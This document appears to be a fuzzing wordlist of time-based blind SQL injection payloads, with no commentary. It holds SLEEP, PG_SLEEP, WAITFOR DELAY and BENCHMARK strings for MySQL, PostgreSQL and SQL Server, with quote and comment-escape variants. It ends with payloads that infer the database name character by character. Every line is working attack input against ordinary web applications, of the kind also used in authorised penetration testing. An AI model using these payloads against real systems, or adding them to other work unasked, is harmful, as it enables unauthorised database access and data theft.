1 UNION SELECT IF(1=1,SLEEP(3),'a'),null -- -
' UNION SELECT IF(1=1,SLEEP(3),'a'),null -- -
1 UNION SELECT IF(1=1,SLEEP(3),1),null -- -
1 AND SLEEP(3)
' AND SLEEP(3) -- -
" AND SLEEP(3) -- -
') AND SLEEP(3) -- -
") AND SLEEP(3) -- -
1 OR PG_SLEEP(3)
' OR PG_SLEEP(3) -- -
" OR PG_SLEEP(3) -- -
1 AND IF(1=1,SLEEP(3),0)
' AND IF(1=1,SLEEP(3),0) -- -
" AND IF(1=1,SLEEP(3),0) -- -
1 WAITFOR DELAY '0:0:3'
'; WAITFOR DELAY '0:0:3' -- -
"; WAITFOR DELAY '0:0:3' -- -
1 AND 1=(SELECT 1 FROM PG_SLEEP(3))
' AND 1=(SELECT 1 FROM PG_SLEEP(3)) -- -
" AND 1=(SELECT 1 FROM PG_SLEEP(3)) -- -
1 AND BENCHMARK(3000000,MD5(1))
' AND BENCHMARK(3000000,MD5(1)) -- -
1 AND BENCHMARK(3000000,MD5(1))
' AND BENCHMARK(3000000,MD5(1)) -- -
" AND BENCHMARK(3000000,MD5(1)) -- -
1 AND IF(ASCII(SUBSTRING(DATABASE(),1,1))>0,SLEEP(3),0)
' AND IF(ASCII(SUBSTRING(DATABASE(),1,1))>0,SLEEP(3),0) -- -
" AND IF(ASCII(SUBSTRING(DATABASE(),1,1))>0,SLEEP(3),0) -- -